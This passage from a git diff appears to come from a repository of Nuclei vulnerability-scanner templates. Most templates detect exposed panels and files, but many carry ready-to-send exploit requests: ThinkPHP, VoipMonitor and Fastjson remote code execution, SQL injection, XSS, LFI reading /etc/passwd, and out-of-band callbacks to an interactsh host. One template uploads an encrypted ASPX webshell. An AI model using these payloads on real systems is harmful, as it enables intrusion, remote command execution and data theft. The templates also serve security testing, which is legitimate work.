(.+)<\/font><\/div>' + part: header diff --git a/poc/other/zuul-panel-11843.yaml b/poc/other/zuul-panel-11843.yaml index 59636f8546..66226c1746 100644 --- a/poc/other/zuul-panel-11843.yaml +++ b/poc/other/zuul-panel-11843.yaml @@ -1,41 +1,27 @@ id: zuul-panel info: - name: Zuul Panel - Detect + name: Zuul Panel author: Yuzhe-zhang-0 severity: info - description: ZUUL panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - reference: - - https://opendev.org/zuul/zuul - metadata: - shodan-query: http.favicon.hash:-1127895693 - tags: panel,zuul,cicd,oss + reference: https://www.shodan.io/search?query=http.title%3A%22zuul%22+http.favicon.hash%3A-1127895693 + tags: panel,Zuul,cicd requests: - method: GET + redirects: true + max-redirects: 5 path: - - '{{BaseURL}}/api/tenants' - '{{BaseURL}}/api/status' + - '{{BaseURL}}/api/tenants' - host-redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: or matchers: - type: word - part: body words: - - '"name":' - - '"projects":' - - '"queue":' - condition: and + - 'zuul_version' - type: word words: - - 'zuul_version' - -# Enhanced by mp on 2023/01/29 + - 'name' + - 'projects' + - 'queue' diff --git a/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml b/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml index afbef78823..2db9a198f3 100644 --- a/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml +++ b/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml @@ -3,8 +3,8 @@ info: name: NUUO NVRmini 2 3.0.8 - Remote Code Execution author: berkdusunur severity: critical - tags: rce - reference: | + tags: rce,nuuo + reference: - https://www.exploit-db.com/exploits/45070 - https://github.com/berkdsnr/NUUO-NVRMINI-RCE - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html diff --git a/poc/php/php-fpm-status.yaml b/poc/php/php-fpm-status.yaml index baedf3cbee..1d1eb52ad1 100644 --- a/poc/php/php-fpm-status.yaml +++ b/poc/php/php-fpm-status.yaml @@ -1,13 +1,16 @@ id: php-fpm-status + info: name: PHP-FPM Status author: geeknik severity: info tags: config + requests: - method: GET path: - "{{BaseURL}}/status?full" + matchers-condition: and matchers: - type: word diff --git a/poc/php/php-proxy-detect-9544.yaml b/poc/php/php-proxy-detect-9544.yaml index 16d49d2f3b..3978ef9413 100644 --- a/poc/php/php-proxy-detect-9544.yaml +++ b/poc/php/php-proxy-detect-9544.yaml @@ -1,26 +1,35 @@ id: php-proxy-detect + info: name: PHP Proxy Detect author: pikpikcu severity: info + metadata: + max-request: 2 tags: tech,php,proxy -requests: + +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/proxy" + matchers-condition: and matchers: - type: word part: body words: - "PHP-Proxy" + - type: status status: - 200 + extractors: - type: regex part: body group: 1 regex: - '' + +# digest: 490a0046304402207b3bef18d95acf42b957d883ee45f5b8190c3e65ec36d4396fc711b1475d80d8022047ca111f8d9b193176ee4cdfa87cba20bfc0236f15921cd92606afa3d93191e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/php/php-timeclock-xss-9553.yaml b/poc/php/php-timeclock-xss-9553.yaml index 4b06f97417..55686517b4 100644 --- a/poc/php/php-timeclock-xss-9553.yaml +++ b/poc/php/php-timeclock-xss-9553.yaml @@ -1,16 +1,18 @@ id: php-timeclock-xss + info: name: PHP Timeclock 1.04 XSS author: pikpikcu severity: medium description: PHP Timeclock version 1.04 (and prior) Cross-Site Scripting vulnerabilities - reference: - - https://www.exploit-db.com/exploits/49853 + reference: https://www.exploit-db.com/exploits/49853 tags: xss,php,timeclock + requests: - method: GET path: - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E" + matchers-condition: and matchers: - type: status @@ -22,6 +24,7 @@ requests: - "PHP Timeclock Admin Login" part: body condition: and + - type: word words: - "text/html" diff --git a/poc/php/phpinfo-9517.yaml b/poc/php/phpinfo-9517.yaml index 3ace8f9693..32db6aac90 100644 --- a/poc/php/phpinfo-9517.yaml +++ b/poc/php/phpinfo-9517.yaml @@ -1,19 +1,15 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: pdteam,daffainfo,meme-lord,dhiyaneshDK,wabafet - description: | - A "PHP Info" page was found. The output of the phpinfo() command can reveal detailed PHP environment information. - remediation: | - Remove PHP Info pages from publicly accessible sites, or restrict access to authorized users only. + author: bauthard severity: low - tags: config,exposure,phpinfo requests: - method: GET path: - "{{BaseURL}}/php.php" - "{{BaseURL}}/phpinfo.php" - "{{BaseURL}}/info.php" + - "{{BaseURL}}/_profiler/phpinfo" - "{{BaseURL}}/infophp.php" - "{{BaseURL}}/php_info.php" - "{{BaseURL}}/test.php" @@ -22,30 +18,9 @@ requests: - "{{BaseURL}}/pinfo.php" - "{{BaseURL}}/phpversion.php" - "{{BaseURL}}/time.php" - - "{{BaseURL}}/index.php" - - "{{BaseURL}}/temp.php" - - "{{BaseURL}}/old_phpinfo.php" - - "{{BaseURL}}/infos.php" - - "{{BaseURL}}/linusadmin-phpinfo.php" - - "{{BaseURL}}/php-info.php" - - "{{BaseURL}}/dashboard/phpinfo.php" - - "{{BaseURL}}/_profiler/phpinfo.php" - - "{{BaseURL}}/_profiler/phpinfo" - stop-at-first-match: true - matchers-condition: and matchers: - type: word - part: body words: - "PHP Extension" - "PHP Version" condition: and - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' diff --git a/poc/php/phpmyadmin-setup.yaml b/poc/php/phpmyadmin-setup.yaml index a501921661..2485003909 100644 --- a/poc/php/phpmyadmin-setup.yaml +++ b/poc/php/phpmyadmin-setup.yaml @@ -1,26 +1,17 @@ id: phpmyadmin-setup + info: - name: Publicly Accessible Phpmyadmin Setup - author: sheikhrishad + name: phpMyAdmin setup page + author: thevillagehacker severity: medium - tags: misc + tags: phpmyadmin + reference: https://hackerone.com/reports/297339 + requests: - method: GET path: - - "{{BaseURL}}/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/_phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/php/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" - stop-at-first-match: true - matchers-condition: and + - "{{BaseURL}}/phpmyadmin/setup/index.php" matchers: - type: word words: - - "You want to configure phpMyAdmin using web interface" - - type: status - status: - - 200 + - "phpMyAdmin setup" diff --git a/poc/php/phpunit.yaml b/poc/php/phpunit.yaml index 5a7c36ba61..0a6b8c40e7 100644 --- a/poc/php/phpunit.yaml +++ b/poc/php/phpunit.yaml @@ -1,16 +1,13 @@ id: phpunit - info: name: phpunit.xml file disclosure author: pikpikcu severity: info tags: exposure - requests: - method: GET path: - "{{BaseURL}}/phpunit.xml" - matchers-condition: and matchers: - type: word @@ -18,7 +15,6 @@ requests: - "" condition: and - - type: status status: - 200 diff --git a/poc/php/phpwiki-lfi-9567.yaml b/poc/php/phpwiki-lfi-9567.yaml index 8d310252a7..d48b733698 100644 --- a/poc/php/phpwiki-lfi-9567.yaml +++ b/poc/php/phpwiki-lfi-9567.yaml @@ -1,23 +1,24 @@ id: phpwiki-lfi + info: - name: phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion + name: phpwiki 1.5.4 - XSS / Local File Inclusion author: 0x_Akoko severity: high - description: phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. - reference: - - https://www.exploit-db.com/exploits/38027 - tags: phpwiki,lfi,xss + reference: https://www.exploit-db.com/exploits/38027 + tags: phpwiki,lfi + requests: - method: GET path: - "{{BaseURL}}/phpwiki/index.php/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/php/ruijie-phpinfo-9951.yaml b/poc/php/ruijie-phpinfo-9951.yaml index 43375c6e21..75be404d8b 100644 --- a/poc/php/ruijie-phpinfo-9951.yaml +++ b/poc/php/ruijie-phpinfo-9951.yaml @@ -1,14 +1,23 @@ id: ruijie-phpinfo + info: - name: Ruijie Phpinfo + name: Ruijie Phpinfo Configuration - Detect author: pikpikcu severity: low - reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - tags: phpinfo,rujjie,config,exposure -requests: + description: Ruijie phpinfo configuration was detected. + classification: + cwe-id: CWE-200 + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + tags: phpinfo,rujjie,config,exposure,ruijie + metadata: + max-request: 1 + +http: - method: GET path: - "{{BaseURL}}/tool/view/phpinfo.view.php" + matchers-condition: and matchers: - type: word @@ -16,6 +25,9 @@ requests: - "PHP Version" - "PHP Extension" condition: and + - type: status status: - 200 + +# Enhanced by cs on 2023/03/02 diff --git a/poc/php/thinkphp-5023-rce-10748.yaml b/poc/php/thinkphp-5023-rce-10748.yaml index 7f9bd46a05..1cda70e12f 100644 --- a/poc/php/thinkphp-5023-rce-10748.yaml +++ b/poc/php/thinkphp-5023-rce-10748.yaml @@ -1,32 +1,32 @@ -id: thinkphp-5023-rce +id: thinkphp-5023-rce -info: - name: ThinkPHP 5.0.23 RCE - author: dr_set - severity: critical - description: Thinkphp5 5.0(<5.0.24) Remote Code Execution. - reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce - tags: thinkphp,rce +info: + name: ThinkPHP 5.0.23 RCE + author: dr_set + severity: critical + description: Thinkphp5 5.0(<5.0.24) Remote Code Execution. + reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce + tags: thinkphp,rce -requests: - - method: POST - path: - - "{{BaseURL}}/index.php?s=captcha" - - headers: - Content-Type: application/x-www-form-urlencoded - - body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1" - - matchers-condition: and - matchers: - - type: word - words: - - "PHP Extension" - - "PHP Version" - - "ThinkPHP" - condition: and - - - type: status - status: +requests: + - method: POST + path: + - "{{BaseURL}}/index.php?s=captcha" + + headers: + Content-Type: application/x-www-form-urlencoded + + body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1" + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + - "ThinkPHP" + condition: and + + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/php/twig-php-ssti.yaml b/poc/php/twig-php-ssti.yaml index f8e8e26d35..d21ecf6b44 100644 --- a/poc/php/twig-php-ssti.yaml +++ b/poc/php/twig-php-ssti.yaml @@ -1,9 +1,10 @@ id: twig-php-ssti + info: name: Twig PHP <2.4.4 template engine - SSTI author: madrobot severity: high - tags: php,ssti + requests: - method: GET path: diff --git a/poc/php/weiphp-sql-injection.yaml b/poc/php/weiphp-sql-injection.yaml index 8b0c9a5a1a..2b57dda7f7 100644 --- a/poc/php/weiphp-sql-injection.yaml +++ b/poc/php/weiphp-sql-injection.yaml @@ -1,24 +1,28 @@ id: weiphp-sql-injection + info: name: WeiPHP 5.0 SQLI author: pikpikcu severity: high - reference: - - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - metadata: - verified: true - shodan-query: http.html:"WeiPHP5.0" + reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md tags: weiphp,sql + requests: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word - part: body words: - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + - type: status status: - 500 diff --git a/poc/php/wp-phpfreechat-xss.yaml b/poc/php/wp-phpfreechat-xss.yaml index f2e72f6d70..ef3aa1dea3 100644 --- a/poc/php/wp-phpfreechat-xss.yaml +++ b/poc/php/wp-phpfreechat-xss.yaml @@ -1,5 +1,4 @@ id: wp-phpfreechat-xss - info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,24 +6,20 @@ info: reference: - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/python/autobahn-python-detect-593.yaml b/poc/python/autobahn-python-detect-593.yaml index 5697bfc546..3a6054cc5a 100644 --- a/poc/python/autobahn-python-detect-593.yaml +++ b/poc/python/autobahn-python-detect-593.yaml @@ -4,12 +4,10 @@ info: name: Autobahn-Python Webserver Detect author: pussycat0x severity: info - metadata: - max-request: 1 - shodan-query: "AutobahnPython" + reference: https://www.shodan.io/search?query=%22AutobahnPython%22 tags: tech,webserver -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -29,5 +27,3 @@ http: part: body regex: - 'AutobahnPython([ 0-9.]+)' - -# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950 diff --git a/poc/python/default-django-page-6841.yaml b/poc/python/default-django-page-6841.yaml index 450d7e265c..cf3cf5a7f7 100644 --- a/poc/python/default-django-page-6841.yaml +++ b/poc/python/default-django-page-6841.yaml @@ -3,8 +3,8 @@ info: name: Django Default Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22The+install+worked+successfully%21+Congratulations%21%22 + metadata: + shodan-query: http.title:"The install worked successfully! Congratulations!" tags: tech,django requests: - method: GET diff --git a/poc/python/django-secret.key.yaml b/poc/python/django-secret.key.yaml index d682cce94f..8ec28a5f5e 100644 --- a/poc/python/django-secret.key.yaml +++ b/poc/python/django-secret.key.yaml @@ -1,62 +1,31 @@ id: django-secret-key info: - name: Django Secret Key Exposure - author: geeknik,DhiyaneshDk + name: Django Secret Key + author: geeknik severity: high - description: | - The Django settings.py file containing a secret key was discovered. An attacker may use the secret key to bypass many security mechanisms and potentially obtain other sensitive configuration information (such as database password) from the settings file. - reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key - metadata: - verified: true - max-request: 7 - shodan-query: html:settings.py - comments: 'This template downloads the manage.py file to check whether it contains line such as: `os.environ.setdefault("DJANGO_SETTINGS_MODULE", "APP_NAME.settings")` if it does, we extract the APP_NAME to know in what folder to look for the settings.py file.' - tags: django,exposure,files + tags: django -http: +requests: - method: GET path: - - "{{BaseURL}}/manage.py" - "{{BaseURL}}/settings.py" - "{{BaseURL}}/app/settings.py" - "{{BaseURL}}/django/settings.py" - "{{BaseURL}}/settings/settings.py" - "{{BaseURL}}/web/settings/settings.py" - - "{{BaseURL}}/{{app_name}}/settings.py" - - stop-at-first-match: true matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: body words: - "SECRET_KEY =" - - type: word part: header words: - "text/html" negative: true - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"DJANGO_SECRET_KEY", "(.*)"' - - - type: regex - part: body - internal: true - name: app_name - group: 1 - regex: - - "os.environ.setdefault\\([\"']DJANGO_SETTINGS_MODULE[\"'],\\s[\"']([a-zA-Z-_0-9]*).settings[\"']\\)" - -# digest: 4a0a00473045022100b9f99aa21141aff5a2e32d9d17a38a880455bee51e9d5cb86222bbadac6086b402203b18b6d4563233114ccc027031dd1a9e01f8d491147509d60836f496edee6d8b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/python/python-metrics.yaml b/poc/python/python-metrics.yaml index 6f69f8e072..0236e8b8eb 100644 --- a/poc/python/python-metrics.yaml +++ b/poc/python/python-metrics.yaml @@ -4,10 +4,10 @@ info: author: dhiyaneshDK severity: low description: Information Disclosure of Garbage Collection - tags: exposure,devops,python reference: - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22 - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c + tags: exposure,devops,python requests: - method: GET path: diff --git a/poc/rabbitmq/rabbitmq-dashboard.yaml b/poc/rabbitmq/rabbitmq-dashboard.yaml index b9add7a446..e881972648 100644 --- a/poc/rabbitmq/rabbitmq-dashboard.yaml +++ b/poc/rabbitmq/rabbitmq-dashboard.yaml @@ -1,10 +1,8 @@ id: rabbitmq-dashboard - info: name: RabbitMQ Dashboard author: fyoorer severity: info - requests: - method: GET path: diff --git a/poc/redis/exposed-redis-7337.yaml b/poc/redis/exposed-redis-7337.yaml index 166260adf7..825d612ae0 100644 --- a/poc/redis/exposed-redis-7337.yaml +++ b/poc/redis/exposed-redis-7337.yaml @@ -4,13 +4,13 @@ info: author: pdteam severity: high reference: https://redis.io/topics/security - tags: network,redis,unauth + tags: network,redis network: - inputs: - data: "info\r\nquit\r\n" host: - "{{Hostname}}" - - "{{Host}}:6379" + - "{{Hostname}}:6379" read-size: 2048 matchers-condition: and matchers: diff --git a/poc/remote_code_execution/Digital-Signage-rce.yaml b/poc/remote_code_execution/Digital-Signage-rce.yaml index c7eea0568a..aa759e322b 100644 --- a/poc/remote_code_execution/Digital-Signage-rce.yaml +++ b/poc/remote_code_execution/Digital-Signage-rce.yaml @@ -1,12 +1,10 @@ id: Digital-Signage-rce - info: name: Digital Signage 3.0.9 版本 QH.aspx 文件 远程代码执行漏洞 author: Str1am severity: critical reference: https://www.zeroscience.mk/codes/qhsignage_rce.txt tags: Digital,rce - requests: - raw: - | @@ -17,22 +15,21 @@ requests: ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="fileToUpload"; filename="cmd.aspx" Content-Type: application/octet-stream - + <%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%> ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="action" - + upload ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="responderId" - + ResourceNewResponder ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="remotePath" - + /opt/resources ------WebKitFormBoundaryhbcZX7o0Hw19h3kr-- - matchers-condition: and matchers: - type: status @@ -43,4 +40,4 @@ requests: - "cmd.aspx" - "true" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/remote_code_execution/SymfonyRCE.yaml b/poc/remote_code_execution/SymfonyRCE.yaml index d0de618202..c78dd48905 100644 --- a/poc/remote_code_execution/SymfonyRCE.yaml +++ b/poc/remote_code_execution/SymfonyRCE.yaml @@ -1,5 +1,4 @@ id: rce-symfony - info: name: symfony rce author: ELSFA7110 @@ -8,19 +7,16 @@ info: - https://www.acunetix.com/vulnerabilities/web/symfony-rce-via-weak-predictable-app_secret - https://www.ambionics.io/blog/symfony-secret-fragment tags: rce - requests: - method: GET path: - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1" - matchers-condition: and matchers: - type: word words: - "PHP Credits" part: body - - type: status status: - 200 diff --git a/poc/remote_code_execution/VOIPrce.yaml b/poc/remote_code_execution/VOIPrce.yaml index 3e99ae09d3..4f33512058 100644 --- a/poc/remote_code_execution/VOIPrce.yaml +++ b/poc/remote_code_execution/VOIPrce.yaml @@ -1,5 +1,4 @@ id: CVE-2021-30461 - info: name: VoipMonitor Pre-Auth-RCE author: nithissh @@ -7,7 +6,6 @@ info: description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ - requests: - raw: - | @@ -21,7 +19,6 @@ requests: Content-Length: 35 SPOOLDIR=test".system(id)."&recheck=Recheck - matchers-condition: and matchers: - type: word @@ -32,7 +29,6 @@ requests: - "VoIPmonitor installation" part: body condition: and - - type: status status: - 200 diff --git a/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml b/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml index f3fd22042e..4a13aa1c66 100644 --- a/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml +++ b/poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml @@ -1,19 +1,16 @@ id: clockwatch-enterprise-rce - info: name: ClockWatch Enterprise RCE author: gy741 severity: critical tags: clockwatch,rce,network reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html - network: - inputs: - data: "C+nslookup {{interactsh-url}}" - host: - "{{Hostname}}" - - "{{Hostname}}:1001" + - "{{Host}}:1001" matchers-condition: and matchers: - type: word diff --git a/poc/remote_code_execution/code42-log4j-rce.yaml b/poc/remote_code_execution/code42-log4j-rce.yaml index bbc3bd9189..31d6ae06ba 100644 --- a/poc/remote_code_execution/code42-log4j-rce.yaml +++ b/poc/remote_code_execution/code42-log4j-rce.yaml @@ -4,8 +4,7 @@ info: author: Adam Crosser severity: critical description: Remote code execution via log4j vulnerability - reference: - - https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents + reference: https://support.code42.com/Terms_and_conditions/Code42_customer_support_resources/Code42_response_to_industry_security_incidents classification: cve-id: CVE-2021-44228 tags: jndi,log4j,rce,cve,cve2021,oast,code42 diff --git a/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml b/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml index 6067f012d4..c50092689f 100644 --- a/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml +++ b/poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml @@ -1,16 +1,11 @@ id: fastjson-1-2-42-rce info: - name: Fastjson 1.2.42 - Remote Code Execution + name: Fastjson 1.2.42 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast requests: - raw: @@ -34,5 +29,3 @@ requests: negative: true status: - 200 - -# Enhanced by mp on 2022/05/25 diff --git a/poc/remote_code_execution/fastjson-1-2-47-rce.yaml b/poc/remote_code_execution/fastjson-1-2-47-rce.yaml index 2971ba72ad..0d9f24a329 100644 --- a/poc/remote_code_execution/fastjson-1-2-47-rce.yaml +++ b/poc/remote_code_execution/fastjson-1-2-47-rce.yaml @@ -1,18 +1,13 @@ id: fastjson-1-2-47-rce info: - name: Fastjson 1.2.47 - Remote Code Execution + name: Fastjson 1.2.47 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce - https://www.freebuf.com/vuls/208339.html - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast requests: - raw: @@ -43,5 +38,3 @@ requests: words: - "Bad Request" - "400" - -# Enhanced by mp on 2022/05/25 diff --git a/poc/remote_code_execution/fastjson-1-2-62-rce.yaml b/poc/remote_code_execution/fastjson-1-2-62-rce.yaml index 0b08215cde..7f16ccb998 100644 --- a/poc/remote_code_execution/fastjson-1-2-62-rce.yaml +++ b/poc/remote_code_execution/fastjson-1-2-62-rce.yaml @@ -1,17 +1,14 @@ id: fastjson-1-2-62-rce + info: - name: Fastjson 1.2.62 - Remote Code Execution + name: Fastjson 1.2.62 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast + requests: - raw: - | @@ -23,15 +20,15 @@ requests: "@type":"org.apache.xbean.propertyeditor.JndiConverter", "AsText":"rmi://{{interactsh-url}}/exploit" } + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" + - type: status negative: true status: - - 200 - -# Enhanced by mp on 2022/05/25 + - 200 \ No newline at end of file diff --git a/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml b/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml index 9798de3adc..49fa7d3d12 100644 --- a/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml +++ b/poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml @@ -1,22 +1,13 @@ id: fastjson-1-2-67-rce - info: - name: Fastjson 1.2.67 - Remote Code Execution + name: Fastjson 1.2.67 Deserialization RCE author: zh severity: critical - description: Fastjson 1.2.67 is susceptible to a remote code execution vulnerability. reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 tags: fastjson,rce,deserialization,oast - metadata: - max-request: 1 - -http: +requests: - raw: - | POST / HTTP/1.1 @@ -30,17 +21,13 @@ http: "UserTransaction":"rmi://{{interactsh-url}}/Exploit" } } - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" - - type: status negative: true status: - 200 - -# Enhanced by mp on 2022/05/25 diff --git a/poc/remote_code_execution/fastjson1_2_47-rce-Deserialization.yaml b/poc/remote_code_execution/fastjson1_2_47-rce-Deserialization.yaml old mode 100755 new mode 100644 diff --git a/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml b/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml index 38e6e72150..cc0303645c 100644 --- a/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml +++ b/poc/remote_code_execution/hashicorp-consul-rce-7890.yaml @@ -1,19 +1,21 @@ id: hashicorp-consul-rce info: - name: Hashicorp Consul Services Api RCE + name: Hashicorp Consul Services API - Remote Code Execution author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/46074 - tags: hashicorp,rce,oob + description: Hashicorp Consul Services API is vulnerable to an attack that can be leveraged to gaino remote command execution on Consul nodes. + reference: + - https://www.exploit-db.com/exploits/46074 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: hashicorp,rce,oast,intrusive requests: - raw: - | # Create USER PUT /v1/agent/service/register HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 205 { "ID": "{{randstr}}", @@ -31,3 +33,5 @@ requests: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + +# Enhanced by mp on 2022/06/01 diff --git a/poc/remote_code_execution/hashicorp-consul-rce.yaml b/poc/remote_code_execution/hashicorp-consul-rce.yaml index 0c4b432be5..d69e9f5708 100644 --- a/poc/remote_code_execution/hashicorp-consul-rce.yaml +++ b/poc/remote_code_execution/hashicorp-consul-rce.yaml @@ -1,16 +1,21 @@ id: hashicorp-consul-rce + info: name: 